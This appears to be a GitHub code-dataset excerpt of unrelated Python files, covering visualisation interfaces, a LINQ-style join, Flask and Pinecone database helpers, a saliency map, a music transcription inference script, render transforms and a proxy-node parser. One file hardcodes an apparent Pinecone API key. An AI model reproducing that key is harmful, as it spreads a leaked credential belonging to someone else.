f\"shape: {node.data.shape}, dtype: {node.data.dtype}\"\n\n # only node\n viz_node = VizNode(node_id, \"Const\", node_detail)\n viz_edges = []\n return viz_node, viz_edges\n\n\nclass Plotter(abc.ABC):\n \"\"\"Plotter can render a collection of Graph interfaces to a file.\"\"\"\n\n @abc.abstractmethod\n def create_graph(self, name: str) -> VizGraph:\n \"\"\"Create a VizGraph\n\n Parameters\n ----------\n name : str\n the name of the graph\n\n Return\n ------\n rv1: an instance of class inheriting from VizGraph interface.\n \"\"\"\n\n @abc.abstractmethod\n def render(self, filename: str) -> None:\n \"\"\"Render the graph as a file.\n\n Parameters\n ----------\n filename : str\n see the definition of implemented class.\n \"\"\"\n","repo_name":"apache/tvm","sub_path":"python/tvm/contrib/relay_viz/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":9816,"program_lang":"python","lang":"en","doc_type":"code","stars":10533,"dataset":"github-code","pt":"95"} +{"seq_id":"25722043421","text":"from ..Generators.RestartableGenerator import *\nfrom ..Types.Exceptions import *\n\nclass OuterJoin:\n \"\"\"\n outerJoin_: Correlates the elements of two sequences based on matching keys. If no matching record is find in the second sequence, None is sent to the output selector.\n Outer Joins are not provided in LINQ. 
This is a new function, following the pattern of join()\n optional equality comparer can be used to compare keys\n If the output selector is left out, results are returned as (first row, second row).\n\n >>> Enumerable outerJoin(Iterable second,\n Func firstKeySelector, Func secondKeySelector,\n Func? outputFunction = None, IEqualityComparer? comparer = None);\n >>> IEqualityComparer = (Predicate | { equals: Predicate });\n \"\"\"\n def outerJoin(self, second, firstKeySelector, secondKeySelector, outputFunction = None, comparer = None):\n if second is None:\n raise ArgumentNullException(\"Required argument is None\")\n if not firstKeySelector or not secondKeySelector:\n raise ArgumentNullException(\"Required argument is None\")\n\n if outputFunction:\n output = outputFunction\n else:\n # if function is missing, return tuple with (left, right)\n output = lambda l, r: (l, r)\n\n def _outerJoin(data):\n # Simple nested loops join\n # If this were SQL server, some analysis and pre-filtering could be done before comparison.\n # This isn't SQL Server. We can't even filter out NULLs, because what if the join function says \"left == null && right == null\", like some linq to entity queries do?\n\n # The right side can theoretically be a generator. We don't know, but we have to take that chance.\n # If it is a generator, it can't be restarted to allow that.\n rightGen = RestartableGenerator(second)\n\n for leftItem in data:\n leftMatched = False\n leftKey = firstKeySelector(leftItem)\n for rightItem in rightGen:\n rightKey = secondKeySelector(rightItem)\n match = False\n if comparer:\n match = comparer(leftKey, rightKey)\n else:\n match = leftKey == rightKey\n if match:\n leftMatched = True\n yield output(leftItem, rightItem)\n\n if not leftMatched:\n yield output(leftItem, None)\n\n rightGen.restart()\n\n return self._extend(_outerJoin)\n","repo_name":"hachiko-8ko/join-to-python","sub_path":"src/join_to_python/EnumerableType/OuterJoin.py","file_name":"OuterJoin.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42621869022","text":"import os\nfrom app import db\nfrom app.models import Item, Category\n\n# run flask commands to create app.db\nos.system('flask db init')\nos.system('flask db migrate -m \\\"items table\\\"')\nos.system('flask db upgrade')\n\n# fill app.db with some initial items\nbase_list = [\n {\n \"category\":'UNCATEGORIZED',\n \"item\":'popcorn'\n },\n {\n \"category\":'PRODUCE',\n \"item\":'apple'\n },\n {\n \"category\":'DAIRY / EGGS',\n \"item\":'cheese'\n },\n]\n\nfor item in base_list:\n c = Category(name=item['category'])\n db.session.add(c)\n db.session.commit()\n\n i = Item(name=item['item'], category_id=c.id)\n db.session.add(i)\n db.session.commit()\n\n\nprint('Added initial list:')\nfor db_item in Item.query.all():\n print(db_item, db_item.category)\n\nprint(\"\\nDo you want to create some initial items? (Y or N)\")\nwhile True:\n \n user_input = input(\">> \")\n\n if user_input[0].lower() == 'y':\n item_name = input(\"\\nEnter the name of an item: \")\n item = Item(name=item_name)\n db.session.add(item)\n db.session.commit()\n print(f\"\\nAdded {item}\")\n print(\"\\nAdd another? 
(Y or N)\")\n \n elif user_input[0].lower() == 'n':\n break\n \n else:\n print(\"\\nPlease enter valid input\")\n print(\"\\tY or N\")\n","repo_name":"kylehorton33/vue-flask-grocery","sub_path":"server/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36327104936","text":"import argparse\nimport csv\nimport re\nimport sys\n\n__author__ = 'Martin Rosellen'\n__docformat__ = \"restructuredtext en\"\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(description='Creates a control csv file in preparation for plotting '\n 'interaction energies with DrawInteractions.py.')\n parser.add_argument('hbonds', help='hbonds_consol.csv')\n parser.add_argument('fdmmpbsa', help='FINAL_DECOMP_MMPBSA_table.csv')\n parser.add_argument('output', help='output file (CSV)')\n parser.add_argument('-m', '--mapping', help='mapping file for residue numbers and chains')\n parser.add_argument('-c', '--column_order', nargs='?', help='Assign chains to columns (e.g. \\'-c CA\\' -> C first, '\n 'A second column)')\n args = parser.parse_args()\n\n entries = []\n\n with open(args.hbonds, 'r') as fo:\n for line in fo:\n entries.append(line[0:7])\n entries.append(line[8:15])\n entries = list(set(entries))\n\n with open(args.fdmmpbsa, 'r') as fo:\n head = fo.readline()\n head = head.strip()\n head = head.split(',')\n head = head[1:]\n\n entries.extend(head)\n\n # remove duplicates\n entries = list(set(entries))\n\n out_lines = []\n with open(args.mapping, 'r') as f:\n mapping = csv.DictReader(f)\n mapping = dict((row['from'], [row['to'], row['chain']]) for row in mapping)\n\n if args.column_order:\n column_order = args.column_order.replace(' ', '')\n else:\n column_order = ''.join(set([item[1] for item in mapping.values()]))\n\n # assign residues to columns\n for entry in entries:\n resnum = re.findall(r'\\d+', entry)[0]\n residue = mapping[resnum][0]\n chain = mapping[resnum][1]\n column = str(column_order.index(chain) + 1)\n out_lines.append(column + \",\" + entry + \",\" + residue + \",\" + chain + \",Hydro\")\n\n out_lines = sorted(out_lines)\n\n with open(args.output, 'w') as out:\n out.writelines(\"Col,Id,Legend,Chain,Fill\" + '\\n')\n for line in out_lines:\n out.writelines(line + '\\n')\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"williamdlees/AmberUtils","sub_path":"CreateInteractionControl.py","file_name":"CreateInteractionControl.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"95"} +{"seq_id":"42449474865","text":"from tornado import web\n\nfrom .. 
import RequestHandler\n\nclass ServersInfoHandler(RequestHandler):\n def initialize(self, server_processes):\n self.server_processes = server_processes\n\n @web.authenticated\n async def get(self):\n data = []\n # Pick out and send only metadata\n # Don't send anything that might be a callable, or leak sensitive info\n for sp in self.server_processes:\n # Manually recurse to convert namedtuples into JSONable structures\n data.append({\n 'name': sp.get('name', 'Unknown')\n })\n\n self.write({'server_processes': data})\n","repo_name":"QPod/qpod-hub","sub_path":"qpod/proxy/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"41841486476","text":"import pinecone, os \n\npinecone.init( \n\tapi_key=\"51a4ed09-15b8-4222-8e46-e9d5a67c78fa\", \n\tenvironment='gcp-starter' \n) \nindex = pinecone.Index('lawyer-info')\n\ndef insert(name, vector):\n index.upsert([\n \n (name, vector)\n\n ])\n\ndef get(vector):\n return index.query(\n vector=[vector],\n top_k=20,\n include_values=True\n )\n \n\n# insert(\"Tanay Desai\", [0.39465588331222534])\n# print(get([0.39465588331222534]))","repo_name":"Sarid10/DataHack_2_Ctrl-Alt-Defeat","sub_path":"Frontend/operations/db_operations.py","file_name":"db_operations.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"10562247181","text":"\n#IMPORTS\nimport cv2\nimport torch\nimport torchvision\nimport torchvision.transforms as T\nimport numpy as np\nimport matplotlib.pyplot as plt\n# from torchsummary import summary\nimport requests\nfrom PIL import Image\nimport h5py\ngame = h5py.File('tj/h5_dataset/a.h5', 'r')\n\n#Using VGG-19 pretrained model for image classification\nmodel = torch.hub.load('pytorch/vision:v0.6.0', 'googlenet', pretrained=True)\n\n# model = torchvision.models.vgg19(pretrained=True)\nfor param in model.parameters():\n param.requires_grad = False\n\ndef download(url,fname):\n response = requests.get(url)\n with open(fname,\"wb\") as f:\n f.write(response.content)\n \n# Downloading the image \n# download(\"https://specials-images.forbesimg.com/imageserve/5db4c7b464b49a0007e9dfac/960x0.jpg?fit=scale\",\"input.jpg\")\n\n# Opening the image\n# img = Image.open('input.jpg') \n\n\n# Preprocess the image\ndef preprocess(image, size=224):\n transform = T.Compose([\n T.Resize(256),\n T.CenterCrop(224),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n return transform(image)\n\n'''\n Y = (X - μ)/(σ) => Y ~ Distribution(0,1) if X ~ Distribution(μ,σ)\n => Y/(1/σ) follows Distribution(0,σ)\n => (Y/(1/σ) - (-μ))/1 is actually X and hence follows Distribution(μ,σ)\n'''\ndef deprocess(image):\n transform = T.Compose([\n T.Lambda(lambda x: x[0]),\n T.Normalize(mean=[0, 0, 0], std=[4.3668, 4.4643, 4.4444]),\n T.Normalize(mean=[-0.485, -0.456, -0.406], std=[1, 1, 1]),\n T.ToPILImage(),\n ])\n return transform(image)\n\ndef show_img(PIL_IMG):\n plt.imshow(np.asarray(PIL_IMG))\n\n\ncapture_ori = cv2.VideoCapture('/home/lol/highlight_360.mp4')\ncapture_ori.set(cv2.CAP_PROP_POS_FRAMES,25010)\nfor pic_num in range(3500,int(capture_ori.get(cv2.CAP_PROP_FRAME_COUNT))):\n ret, frame = capture_ori.read()\n capture_ori_convert = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n capture_ori_pil = Image.fromarray(capture_ori_convert)\n\n input_tensor = preprocess(capture_ori_pil)\n print('tensor :', 
input_tensor.shape)\n\n input_batch = input_tensor.unsqueeze(0)\n print(input_batch.shape)\n\n # cv2.imshow('sex', input_tensor)\n\n break\n\n# preprocess the image\n# X = preprocess(input_batch[0])\n# we would run the model in evaluation mode\nmodel.eval()\n\n# we need to find the gradient with respect to the input image, so we need to call requires_grad_ on it\ninput_batch.requires_grad_()\n\n'''\nforward pass through the model to get the scores, note that VGG-19 model doesn't perform softmax at the end\nand we also don't need softmax, we need scores, so that's perfect for us.\n'''\n\nscores = model(input_batch)\n\n# Get the index corresponding to the maximum score and the maximum score itself.\nscore_max_index = scores.argmax()\nscore_max = scores[0,score_max_index]\n\n'''\nbackward function on score_max performs the backward pass in the computation graph and calculates the gradient of \nscore_max with respect to nodes in the computation graph\n'''\nscore_max.backward()\n\n'''\nSaliency would be the gradient with respect to the input image now. But note that the input image has 3 channels,\nR, G and B. To derive a single class saliency value for each pixel (i, j), we take the maximum magnitude\nacross all colour channels.\n'''\nsaliency, _ = torch.max(input_batch.grad.data.abs(),dim=1)\n\n# code to plot the saliency map as a heatmap\nfig=plt.figure(figsize=(100, 200))\nfig.add_subplot(1, 3, 1)\nplt.imshow(input_tensor[0])\nfig.add_subplot(1, 3, 2)\nimg = Image.open('s.jpg') \n# img = T.functional.crop(img, 50, 50, 290, 770)\nnewnew =T.Compose([\n T.Resize((240, 426)),\n T.ToTensor(),\n ])\nframe = newnew(img)\nprint('asdfadfadfasfd', frame.shape)\nframe=frame[:, 25:145, 25:385]\nprint('aewf', frame.shape)\nprint(type(frame))\ntorchvision.utils.save_image(frame, \"/home/lol/Desktop/a.jpg\")\n# farme.save_image\nexit()\ncv2.imshow('a', frame)\nfig.add_subplot(1, 3, 3)\n\nplt.imshow(saliency[0], cmap=plt.cm.hot)\n# plt.axis('off')\nplt.show()","repo_name":"cjsjyh/lol_highlight_ai","sub_path":"model/evaluation/saliency_map.py","file_name":"saliency_map.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"3247306017","text":"# Advent of Code 2022: Day 18\n\n\ndef neighbors(cord):\n x = cord[0]\n y = cord[1]\n z = cord[2]\n\n return [[x-1, y, z], [x+1, y, z],\n [x, y-1, z], [x, y+1, z],\n [x, y, z-1], [x, y, z+1]]\n\n\nif __name__ == '__main__':\n with open('data/input-18.txt') as f:\n puzzle_input = f.read().splitlines()\n\n cords_list = [list(map(int, line.split(','))) for line in puzzle_input]\n\n empty_sides = 0\n for cord in cords_list:\n empty_sides += len([point for point in neighbors(cord) if point not in cords_list])\n\n # Part 1\n print(f\"Part 1: {empty_sides}\")\n\n # Part 2\n min_x = min(x[0] for x in cords_list) - 1\n max_x = max(x[0] for x in cords_list) + 1\n min_y = min(x[1] for x in cords_list) - 1\n max_y = max(x[1] for x in cords_list) + 1\n min_z = min(x[2] for x in cords_list) - 1\n max_z = max(x[2] for x in cords_list) + 1\n\n outside_cubes = [[min_x, min_y, min_z]]\n visited = []\n while outside_cubes:\n this_cube = outside_cubes.pop()\n visited.append(this_cube)\n\n adj_cords = neighbors(this_cube)\n for test_cord in adj_cords:\n if (min_x <= test_cord[0] <= max_x) and (min_y <= test_cord[1] <= max_y) and (min_z <= test_cord[2] <= max_z):\n if test_cord not in visited and test_cord not in cords_list:\n outside_cubes.append(test_cord)\n\n outside_surface = 0\n for 
cord in cords_list:\n outside_surface += len([neigh for neigh in neighbors(cord) if neigh in visited])\n\n print(f\"Part 2: {outside_surface}\")\n\n","repo_name":"RyanWhitcomb-VT/advent_of_code_2022","sub_path":"day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15611947459","text":"from model import *\nfrom torch.utils.data import DataLoader, random_split\nfrom parse import *\nimport argparse\nimport wandb\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom copy import deepcopy\nfrom sklearn.metrics import f1_score\ng = torch.Generator()\ng.manual_seed(26)\n\n\ndef plot(\n pitch_lst: List[int],\n onset_lst: List[int],\n ax: matplotlib.axes.Axes,\n title: str = None\n):\n segments = []\n for i, v in enumerate(pitch_lst):\n if ID2PITCH[v] == '':\n continue\n pitch = piano_key2midi_id(ID2PITCH[v])\n segments += [((i, pitch), (i+1, pitch))]\n ax.add_collection(LineCollection(segments))\n \n for i, x in enumerate(onset_lst):\n if x == 0:\n continue\n pitch = piano_key2midi_id(ID2PITCH[pitch_lst[i]])\n ax.vlines(i, pitch-0.5, pitch+0.5, color='r' if 'pred' in title else 'g', alpha=0.9, linestyle='solid')\n \n ax.autoscale()\n m = ax.get_yticks().tolist()\n for i in range(len(m)):\n m[i] = midi_id2piano_key(int(m[i]))\n ax.set_yticklabels(m)\n ax.set_title(title)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n # ViT-extractor\n parser.add_argument('--image_size', type=int, default=512)\n parser.add_argument('--patch_size', type=int, default=2)\n parser.add_argument('--num_classes', type=int, default=1000)\n parser.add_argument('--dim', type=int, default=256)\n parser.add_argument('--depth', type=int, default=3)\n parser.add_argument('--heads', type=int, default=16)\n parser.add_argument('--mlp_dim', type=int, default=256)\n parser.add_argument('--dropout', type=float, default=0.2)\n parser.add_argument('--out_dim', type=int, default=512)\n parser.add_argument('--extractor_name', type=str, default=None)\n parser.add_argument('--hidden_size', type=int, default=None)\n # training\n parser.add_argument('--max_epochs', type=int, default=100)\n parser.add_argument('--opt_name', type=str, default='AdamW')\n parser.add_argument('--lr', type=float, default=5e-5)\n parser.add_argument('--loss_alpha', type=float, default=0.5)\n # transformer\n parser.add_argument('--is_causal', type=bool, default=False)\n parser.add_argument('--nhead', type=int, default=8)\n parser.add_argument('--num_layers', type=int, default=4)\n # rnn\n parser.add_argument('--rnn_type', type=str, default=None)\n parser.add_argument('--bidirectional', type=bool, default=False)\n # misc\n parser.add_argument('--comment', type=str, default=None)\n parser.add_argument('--debug', type=bool, default=False)\n parser.add_argument('--project_name', type=str, default='MTTLead')\n parser.add_argument('--dataset_length', type=int, default=5000)\n args = parser.parse_args()\n args.dataset_length = TOT_TRACK\n print(args)\n config = vars(args)\n \n if args.num_layers == 2:\n pitch_ckpt = '/root/mtt/ckpt/MTTLeadPitchMMMRetrain/aymgyy5c/checkpoints/epoch=19-step=64000.ckpt'\n onset_ckpt = '/root/mtt/ckpt/MTTLeadOnsetMMMRetrain/ub4g9z64/checkpoints/epoch=19-step=64000.ckpt'\n elif args.num_layers == 4:\n pitch_ckpt = '/root/mtt/ckpt/MTTLeadPitchMMMRetrain/bvgo5p4s/checkpoints/epoch=19-step=64000.ckpt'\n onset_ckpt = 
'/root/mtt/ckpt/MTTLeadOnsetMMMRetrain/c2nkrark/checkpoints/epoch=19-step=64000.ckpt'\n \n wandb.init(\n entity='gariscat',\n project='MTTLeadJointInferenceMMM',\n )\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n pitch_config = deepcopy(config)\n pitch_config['num_layers'] = 3\n pitch_model = LeadModel.load_from_checkpoint(\n pitch_ckpt,\n config=config,\n loss_alpha=1\n ).to(device)\n onset_config = deepcopy(config)\n onset_config['num_layers'] = 1\n onset_model = LeadModel.load_from_checkpoint(\n onset_ckpt,\n config=config,\n loss_alpha=0,\n ).to(device)\n \n pitch_model.eval()\n onset_model.eval()\n \n dataset = LeadNoteDataset(length=args.dataset_length)\n \n train_set, val_set = random_split(dataset, [0.8, 0.2], generator=g)\n # train_loader = DataLoader(dataset=train_set, batch_size=1,)\n val_loader = DataLoader(dataset=val_set, batch_size=1,)\n \n print(ID2PITCH)\n \n all_onset_gt = []\n all_onset_pred = []\n all_pitch_gt = []\n all_pitch_pred = []\n \n for batch in tqdm(val_loader):\n pitch_gt, onset_gt, mel_left, mel_right, json_path = batch\n mel_tensor = torch.cat((mel_left, mel_right), dim=1).to(device)\n \n pitch_logits, _ = pitch_model.forward(mel_tensor)\n _, onset_logits = onset_model.forward(mel_tensor)\n \n pitch_pred = pitch_logits.argmax(-1)\n onset_pred = onset_logits.argmax(-1)\n \n pitch_gt = pitch_gt.flatten().numpy().tolist()\n onset_gt = onset_gt.flatten().numpy().tolist()\n pitch_pred = pitch_pred.detach().cpu().flatten().numpy().tolist()\n onset_pred = onset_pred.detach().cpu().flatten().numpy().tolist()\n \n # validate the notes\n \n L = len(pitch_gt)\n \n for i in range(L):\n if onset_pred[i]:\n if pitch_pred[i] == 0:\n onset_pred[i] = 0\n else:\n if pitch_pred[i]:\n if i == 0 or pitch_pred[i-1] != pitch_pred[i]:\n pitch_pred[i] = 0\n \n # plot\n \n fig, axes = plt.subplots(nrows=2, ncols=1, sharex=True)\n plot(pitch_gt, onset_gt, axes[0], 'ground truth')\n plot(pitch_pred, onset_pred, axes[1], 'prediction')\n plt.suptitle(json_path)\n \n # log\n \n buf = io.BytesIO()\n fig.savefig(buf)\n buf.seek(0)\n img = Image.open(buf)\n # print(type(img))\n img = wandb.Image(img)\n # print(type(img))\n wandb.log({\"joint_inference_samples\": img})\n plt.close()\n \n all_onset_gt += onset_gt\n all_onset_pred += onset_pred\n all_pitch_gt += pitch_gt\n all_pitch_pred += pitch_pred\n \n \n # calculate the metrics\n \n onset_f1 = f1_score(np.array(all_onset_gt), np.array(all_onset_pred))\n pitch_f1 = f1_score(np.array(all_pitch_gt), np.array(all_pitch_pred), average='macro')\n print(\"onset_f1:\", onset_f1)\n print(\"pitch_f1:\", pitch_f1)","repo_name":"Gariscat/mtt","sub_path":"joint_infer.py","file_name":"joint_infer.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"35728458842","text":"import json\r\nfrom renderapi.errors import RenderError\r\nfrom renderapi.transform.leaf import load_leaf_json\r\n__all__ = [\r\n 'TransformList',\r\n 'ReferenceTransform',\r\n 'InterpolatedTransform',\r\n 'load_transform_json']\r\n\r\n\r\nclass TransformList:\r\n \"\"\"A list of Transforms\r\n\r\n Attributes\r\n ----------\r\n tforms : :obj:`list` of :class:`Transform`\r\n transforms to apply\r\n transformId : str, optional\r\n uniqueId for this TransformList\r\n \"\"\"\r\n\r\n def __init__(self, tforms=None, transformId=None, json=None):\r\n \"\"\"Initialize TransformList\r\n\r\n Parameters\r\n ----------\r\n tforms : :obj:`list` of :class:`Transform`\r\n 
transforms to apply\r\n transformId : str, optional\r\n uniqueId for this TransformList\r\n json : dict, optional\r\n json compatible dictionary to create\r\n :class:`TransformList` via :method:`from_dict`\r\n (will supersede tforms and transformId if not None)\r\n \"\"\"\r\n if json is not None:\r\n self.from_dict(json)\r\n else:\r\n if tforms is None:\r\n self.tforms = []\r\n else:\r\n if not isinstance(tforms, list):\r\n raise RenderError(\r\n 'unexpected type {} for transforms!'.format(\r\n type(tforms)))\r\n self.tforms = tforms\r\n self.transformId = transformId\r\n\r\n def to_dict(self):\r\n \"\"\"serialization function\r\n\r\n Returns\r\n -------\r\n dict\r\n json & render compatible representation of this TransformList\r\n \"\"\"\r\n d = {}\r\n d['type'] = 'list'\r\n d['specList'] = [tform.to_dict() for tform in self.tforms]\r\n if self.transformId is not None:\r\n d['id'] = self.transformId\r\n return d\r\n\r\n def to_json(self):\r\n \"\"\"serialization function\r\n\r\n Returns\r\n -------\r\n str\r\n string representation of the json & render\r\n representation of this TransformList\r\n \"\"\"\r\n return json.dumps(self.to_dict())\r\n\r\n def from_dict(self, d):\r\n \"\"\"deserialization function\r\n\r\n Parameters\r\n ----------\r\n d : dict\r\n json compatible dictionary representation of this TransformList\r\n \"\"\"\r\n self.tforms = []\r\n if d is not None:\r\n self.transformId = d.get('id')\r\n for td in d['specList']:\r\n self.tforms.append(load_transform_json(td))\r\n return self.tforms\r\n\r\n\r\nclass InterpolatedTransform:\r\n \"\"\"Transform spec defined by linear interpolation of\r\n two other transform specs\r\n\r\n Attributes\r\n ----------\r\n a : :class:`Transform` or :class:`TransformList` or :class:`InterpolatedTransform`\r\n transform at minimum weight\r\n b : :class:`Transform` or :class:`TransformList` or :class:`InterpolatedTransform`\r\n transform at maximum weight\r\n lambda_ : float\r\n value in interval [0.,1.] which defines evaluation of the\r\n linear interpolation between a (at 0) and b (at 1)\r\n \"\"\" # noqa: E501\r\n\r\n def __init__(self, a=None, b=None, lambda_=None, json=None):\r\n \"\"\"Initialize InterpolatedTransform\r\n\r\n Parameters\r\n ----------\r\n a : :class:`Transform` or :class:`TransformList`\r\n or :class:`InterpolatedTransform`\r\n transform at minimum weight\r\n b : :class:`Transform` or :class:`TransformList`\r\n or :class:`InterpolatedTransform`\r\n transform at maximum weight\r\n lambda_ : float\r\n value in interval [0.,1.] 
which defines evaluation of the\r\n linear interpolation between a (at 0) and b (at 1)\r\n json : dict\r\n json compatible representation of this transform to\r\n initialize via :method:`self.from_dict`\r\n (will supersede a, b, and lambda_ if not None)\r\n \"\"\"\r\n if json is not None:\r\n self.from_dict(json)\r\n else:\r\n self.a = a\r\n self.b = b\r\n self.lambda_ = lambda_\r\n\r\n def to_dict(self):\r\n \"\"\"serialization routine\r\n Returns\r\n -------\r\n dict\r\n json compatible representation\r\n \"\"\"\r\n return dict(self)\r\n\r\n def from_dict(self, d):\r\n \"\"\"deserialization routine\r\n Parameters\r\n ----------\r\n d : dict\r\n json compatible representation\r\n \"\"\"\r\n self.a = load_transform_json(d['a'])\r\n self.b = load_transform_json(d['b'])\r\n self.lambda_ = d['lambda']\r\n\r\n def __iter__(self):\r\n return iter([('type', 'interpolated'),\r\n ('a', self.a.to_dict()),\r\n ('b', self.b.to_dict()),\r\n ('lambda', self.lambda_)])\r\n\r\n\r\nclass ReferenceTransform:\r\n \"\"\"Transform which is simply a reference to a transform stored elsewhere\r\n Attributes\r\n ----------\r\n refId : str\r\n transformId of the referenced transform\r\n \"\"\"\r\n\r\n def __init__(self, refId=None, json=None):\r\n \"\"\"Initialize ReferenceTransform\r\n Parameters\r\n ----------\r\n refId : str\r\n transformId of the referenced transform\r\n json : dict\r\n json compatible representation of this transform\r\n (will supersede refId if not None)\r\n \"\"\"\r\n if json is not None:\r\n self.from_dict(json)\r\n else:\r\n self.refId = refId\r\n\r\n def to_dict(self):\r\n \"\"\"serialization routine\r\n Returns\r\n -------\r\n dict\r\n json compatible representation of this transform\r\n \"\"\"\r\n d = {}\r\n d['type'] = 'ref'\r\n d['refId'] = self.refId\r\n return d\r\n\r\n def from_dict(self, d):\r\n \"\"\"deserialization routine\r\n Parameters\r\n ----------\r\n d : dict\r\n json compatible representation of this transform\r\n \"\"\"\r\n self.refId = d['refId']\r\n\r\n def __str__(self):\r\n return 'ReferenceTransform(%s)' % self.refId\r\n\r\n def __repr__(self):\r\n return self.__str__()\r\n\r\n def __iter__(self):\r\n return iter([('type', 'ref'), ('refId', self.refId)])\r\n\r\n\r\ndef load_transform_json(d, default_type='leaf'):\r\n \"\"\"function to get the proper deserialization function\r\n\r\n Parameters\r\n ----------\r\n d : dict\r\n json compatible representation of Transform\r\n default_type : str\r\n what kind of transform should we assume this\r\n if it is not specified in 'type' ('leaf','list','ref','interpolated')\r\n\r\n Returns\r\n -------\r\n renderapi.transform.Transform\r\n deserialized transformation using the most appropriate class\r\n\r\n Raises\r\n ------\r\n RenderError\r\n if d['type'] isn't one of ('leaf','list','ref','interpolated')\r\n \"\"\"\r\n handle_load_tform = {'leaf': load_leaf_json,\r\n 'list': lambda x: TransformList(json=x),\r\n 'ref': lambda x: ReferenceTransform(json=x),\r\n 'interpolated':\r\n lambda x: InterpolatedTransform(json=x)}\r\n try:\r\n return handle_load_tform[d.get('type', default_type)](d)\r\n except KeyError as e:\r\n raise RenderError('Unknown Transform Type {}'.format(e))\r\n","repo_name":"AllenInstitute/render-python","sub_path":"renderapi/transform/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"71838277110","text":"\nimport random \nimport yaml\n\nimport co6co.utils as utils \nfrom 
.nodeLink import * \nfrom .node import *\nfrom co6co.utils import log\nfrom typing import List\n \n \ndef _getName(name)->str:\n '''\n 取出空白,为None 随机名字\n '''\n name=name.strip() if name else None\n if name ==None: f\"未知_{random.randrange(1,100000)}\"\n pattern=\"\\s+\"\n return re.sub(pattern,'',name)\n\"\"\"\nyaml 文件 解析\n\"\"\"\ndef _parseYaml(yamlContent): # 解析yaml文本\n '''\n 解析yaml 文本\n 生成 Nodes节点\n '''\n try:\n yml = yaml.load(yamlContent, Loader=yaml.FullLoader) \n tmp_list = []\n # clash新字段\n if yml.get('proxies'):tmp_list = yml.get('proxies')\n # clash旧字段\n elif yml.get('Proxy'):tmp_list = yml.get('Proxy')\n else:log.warn('clash节点提取失败,clash节点为空') \n return _parseYamlNode(tmp_list) \n except:\n raise\ndef _parseYamlNode(nodes:list):\n '''\n 解析Yaml文件中的node 节点\n nodes: yaml.get('proxies') 或者 yaml.get('Proxy')\n return :nodes 基本上也是返回 参数,仅作整理过滤\n '''\n nodes_list = []\n for node in nodes:\n node['name'] = _getName( node['name'])\n node['server']=node['server'].strip()\n # 对clashR的支持\n if node.get('protocolparam'):\n node['protocol-param'] = node['protocolparam']\n del node['protocolparam']\n if node.get('obfsparam'):\n node['obfs-param'] = node['obfsparam']\n del node['obfsparam']\n node['udp'] = True\n node['port'] = int(node['port']) \n\n if node.get('name')==None: continue\n nodes_list.append(node)\n return nodes_list\n\n\"\"\"\ntext 文件 解析\n\"\"\"\ndef _parseNodeText(text:str| bytes): # 解析 从 base64 解析出来的文本 \n '''\n text: b64decode 解析出来的文本\n 解析节点\n '''\n text_list = text.splitlines()\n \n #if type(text) == str: text_list=[itm.encode(\"utf-8\") for itm in text_list] \n return parser(text_list)\n\ndef parser(nodeUrls: List[str] | List[bytes])->List[dict]|None: \n nodes_list= []\n for node in nodeUrls: \n if type(node) == str: node =node.encode(\"utf-8\") \n try:\n print(node)\n denode=None\n toClashNode=None\n if is_vmess_node(node): \n denode=decode_v2ray_node\n toClashNode=v2ray_to_clash\n elif is_ss_node(node):\n denode = decode_ss_node \n toClashNode=ss_to_clash \n elif is_ssr_node(node):\n denode = decode_ssr_node \n toClashNode=ssr_to_clash \n\n elif is_trojan_node(node):\n denode= decode_trojan_node \n toClashNode=trojan_to_clash \n else:\n continue \n tmp_node = denode(node) \n clash_node = toClashNode(tmp_node)\n clash_node['name'] = _getName(clash_node['name'])\n nodes_list.append(clash_node)\n except Exception as e:\n log.err(f'节点转换出错:\"{node}\",{e}') \n continue \n if len(nodes_list) > 0: return nodes_list\n else: return None\n \ndef __check(nodesContent:str)->list|dict|str:\n try:\n yamlData=yaml.full_load(nodesContent)\n return yamlData\n except:\n return nodesContent\n \ndef parser_content(nodesContent:str)->List[dict]:\n \"\"\"\n 解析文本为 clash节点s\n \"\"\" \n nodes_list = [] \n try: \n # \n yamlData =__check(nodesContent) \n if type (yamlData) == dict: #yaml 格式\n #log.succ(f\"{type(yamlData)}’yaml dict‘<--{addr}\")\n nodes_list=_parseYaml(nodesContent)\n elif type (yamlData) == list and type(yamlData[0]) == dict: #yaml 格式中的节点\n #log.succ(f\"{type(yamlData)} ’yaml list dict‘<--{addr}\")\n nodes_list=_parseYamlNode(yamlData)\n else: # base64加密 or node list\n #og.succ(f\"{type(yamlData)} ’TEXT‘<--{addr}\")\n # base64 需要解密后内容 \n rawTxt = base64.b64decode(nodesContent) if utils.isBase64(nodesContent) else nodesContent \n #log.err(f\"{type(rawTxt)},\\n{rawTxt}\") \n 